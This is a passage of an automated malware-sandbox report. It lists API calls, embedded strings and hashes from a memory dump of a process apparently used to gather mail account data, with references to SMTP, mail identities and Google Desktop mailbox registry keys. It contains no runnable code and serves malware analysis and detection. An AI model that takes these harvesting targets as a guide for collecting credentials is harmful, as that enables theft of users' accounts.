                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi$_mbscpy
                    • String ID: smtp
                    • API String ID: 2625860049-60245459
                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                    APIs
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408258
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                    Strings
                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Close$EnumOpenmemset
                    • String ID: Software\Google\Google Desktop\Mailboxes
                    • API String ID: 2255314230-2212045309
                    • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                    • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                    APIs
                    • memset.MSVCRT ref: 0040C28C
                    • SetFocus.USER32(?,?), ref: 0040C314
                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FocusMessagePostmemset
                    • String ID: S_@$l
                    • API String ID: 3436799508-4018740455
                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                    APIs
                    • memset.MSVCRT ref: 004092C0
                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                    • _mbscpy.MSVCRT ref: 004092FC
                    Strings
                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString_mbscpymemset
                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                    • API String ID: 408644273-3424043681
                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy
                    • String ID: C^@$X$ini
                    • API String ID: 714388716-917056472
                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                    • String ID: MS Sans Serif
                    • API String ID: 3492281209-168460110
                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ClassName_strcmpimemset
                    • String ID: edit
                    • API String ID: 275601554-2167791130
                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_mbscat
                    • String ID: 3CD
                    • API String ID: 3951308622-1938365332
                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: rows deleted
                    • API String ID: 2221118986-571615504
                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                    • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                    APIs
                    • __allrem.LIBCMT ref: 00425850
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                    • __allrem.LIBCMT ref: 00425933
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                    APIs
                    Strings
                    • too many SQL variables, xrefs: 0042C6FD
                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                    • API String ID: 2221118986-515162456
                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                    APIs
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                    • memset.MSVCRT ref: 004026AD
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                      • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                    • LocalFree.KERNEL32(?), ref: 004027A6
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                    • String ID:
                    • API String ID: 1593657333-0
                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                    APIs
                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                    • strlen.MSVCRT ref: 0040B60B
                    • atoi.MSVCRT ref: 0040B619
                    • _mbsicmp.MSVCRT ref: 0040B66C
                    • _mbsicmp.MSVCRT ref: 0040B67F
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbsicmp$??2@??3@atoistrlen
                    • String ID:
                    • API String ID: 4107816708-0
                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                    • String ID:
                    • API String ID: 1886415126-0
                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: >$>$>
                    • API String ID: 39653677-3911187716
                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: @
                    • API String ID: 3510742995-2766056989
                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi
                    • String ID: C@$mail.identity
                    • API String ID: 1439213657-721921413
                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                    APIs
                    • memset.MSVCRT ref: 00406640
                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                      • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                    • memcmp.MSVCRT ref: 00406672
                    • memcpy.MSVCRT ref: 00406695
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset$memcmp
                    • String ID: Ul@
                    • API String ID: 270934217-715280498
                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@
                    • String ID:
                    • API String ID: 613200358-0
                    • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                    • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                    APIs
                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                    Strings
                    • recovered %d pages from %s, xrefs: 004188B4
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                    • String ID: recovered %d pages from %s
                    • API String ID: 985450955-1623757624
                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _ultoasprintf
                    • String ID: %s %s %s
                    • API String ID: 432394123-3850900253
                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                    APIs
                    • LoadMenuA.USER32(00000000), ref: 00409078
                    • sprintf.MSVCRT ref: 0040909B
                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                    • String ID: menu_%d
                    • API String ID: 1129539653-2417748251
                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                    APIs
                    Strings
                    • failed memory resize %u to %u bytes, xrefs: 00411706
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _msizerealloc
                    • String ID: failed memory resize %u to %u bytes
                    • API String ID: 2713192863-2134078882
                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                    APIs
                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                    • strrchr.MSVCRT ref: 00409808
                    • _mbscat.MSVCRT ref: 0040981D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleName_mbscatstrrchr
                    • String ID: _lng.ini
                    • API String ID: 3334749609-1948609170
                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                    APIs
                    • _mbscpy.MSVCRT ref: 004070EB
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 004070FA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$_mbscpystrlen
                    • String ID: sqlite3.dll
                    • API String ID: 1983510840-1155512374
                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                    APIs
                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString
                    • String ID: A4@$Server Details
                    • API String ID: 1096422788-4071850762
                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
